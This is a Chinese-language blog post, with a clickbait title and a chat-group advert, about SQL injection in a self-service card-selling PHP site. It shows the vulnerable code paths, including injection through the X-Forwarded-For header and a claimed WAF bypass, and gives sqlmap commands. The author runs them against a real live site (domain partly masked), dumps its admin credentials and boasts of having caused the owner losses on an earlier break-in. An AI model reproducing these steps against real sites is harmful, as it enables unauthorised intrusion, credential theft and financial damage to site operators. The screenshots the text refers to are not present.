就因為用寫了一個自助提卡系統!居然一個月掙的比一年多!勿商用
相關環境
源碼信息:你猜啊
漏洞類型:Forwarded-For註入
搭建成功之後如下 :
看到如下頁面是不是有似曾相識的感受:
進群:125240963 即可獲取數十套PDF哦!
上圖是安裝過後的首頁,就是一個提卡網,繼續吧!
這裏很明顯我們看到了SQL註入,首先判斷是否設置$_POST[“dh”]不為空則將該參數拼接到SQL語句中,看到這裏就可以判斷出該程序存在聯合查詢註入,可是$config哪來的,這個文件也沒包含其它的文件啊!!!怎麽辦呢?那麽我們就來找找index文件中是否包含了api.php,search一下
可以看到在294行這裏包含了api.php文件,我們構造下放入sqlmap中玩一玩。
Python sqlmap.py -u “http://localhost:8081/index.php” --batch --dbms=”mysql” --data=”dh=a”
我們嘗試本地站點的時候毫無問題,為什麽這個提卡網就沒有存在這個問題了呢?很明顯這個網站可能是升級或者二開發過的,我們接著看看其它點,進入./pay/pay.php文件:
代碼過多就不一一貼圖出來了,主要構成漏洞的代碼就在這其中,我們從38行開始看著走。
這裏判斷$_GET[“type”]等於delete的時候則執行40-49行的代碼,41將獲取到的ip拼接到sql語句中,我們看看ip函數:
好了,現在我們打開burp進行抓包,然後偽造ip進行一系列的嘿嘿了,因為./pay/index.php中包含了pay.php,所以我們對index.php進行註入就好
正常頁面:
錯誤頁面:
好的,現在看到了吧!我們放到SQLmap中跑一下看看,我們將這個數據包保存到文本中,並且標註註入位置:X-Forwarded-For這個註入還自帶繞過waf功能,因為很多waf不會檢測hander參數。
Python sqlmap.py -r test.txt --batch --dbms="mysql"
我們對那個網站測試一番,訪問:http://lxxxx.pw/pay/index.php?type=zfb&money=1&title=adssad&pwd=123
把該數據放到文本中,接著進行測試:
Python sqlmap.py -r test.txt --batch --dbms="mysql"
成功挖掘到了該網站的漏洞,繼續。
Python sqlmap.py -r test.txt --batch -D yulinxscom --tables
Python sqlmap.py -r test.txt --batch -D yulinxscom -T admin --dump
拿到了管理賬號及密碼。接著訪問。
默認後臺:http://lxxxx.pw/admin.php
由於之前進去過一次,讓他虧損了點錢,現在後臺的名字也改了 。
就因為用寫了一個自助提卡系統!居然一個月掙的比一年多!勿商用